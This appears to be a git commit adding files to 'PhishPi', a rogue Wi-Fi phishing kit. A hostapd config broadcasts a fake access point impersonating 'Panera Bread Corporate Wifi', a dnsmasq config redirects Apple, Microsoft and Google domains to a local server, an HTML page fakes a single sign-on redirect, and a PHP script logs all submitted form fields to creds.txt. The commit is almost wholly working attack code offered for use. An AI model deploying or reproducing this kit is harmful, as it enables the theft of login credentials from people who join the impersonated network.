assume-breach 3 лет назад
Родитель
Сommit
20adfc8d3c

+ 4 - 0
PhishPi/Resources/authenticate.html

@@ -0,0 +1,4 @@
+<!DOCTYPE html>
+</html>
+Redirecting To Single Sign-On Authentication...
+<meta http-equiv="refresh" content="4;URL='http://10.1.1.1/signin.html'">

+ 19 - 0
PhishPi/Resources/dnsmasq.conf

@@ -0,0 +1,19 @@
+interface=br0
+listen-address=10.1.1.1
+no-hosts
+dhcp-range=10.1.1.2,10.1.1.254,10m
+dhcp-option=option:router,10.1.1.1
+dhcp-authoritative
+
+address=/apple.com/10.1.1.1
+address=/appleiphonecell.com/10.1.1.1
+address=/airport.us/10.1.1.1
+address=/akamaiedge.net/10.1.1.1
+address=/akamaitechnologies.com/10.1.1.1
+address=/microsoft.com/10.1.1.1
+address=/msftncsi.com/10.1.1.1
+address=/msftconnecttest.com/10.1.1.1
+address=/google.com/10.1.1.1
+address=/gstatic.com/10.1.1.1
+address=/googleapis.com/10.1.1.1
+address=/android.com/10.1.1.1

+ 8 - 0
PhishPi/Resources/hostapd.conf

@@ -0,0 +1,8 @@
+interface=wlan1
+channel=6
+hw_mode=g
+ssid=Panera Bread Corporate Wifi
+bridge=br0
+auth_algs=1
+wmm_enabled=0
+

+ 14 - 0
PhishPi/Resources/post.php

@@ -0,0 +1,14 @@
+<?php
+header ('Location:http://10.1.1.1/sso.html');
+$handle = fopen("creds.txt", "a");
+foreach($_POST as $variable => $value) {
+   fwrite($handle, $variable);
+   fwrite($handle, "=");
+   fwrite($handle, $value);
+   fwrite($handle, "\r\n");
+}
+fwrite($handle, "\r\n");
+fclose($handle);
+exit;
+?>
+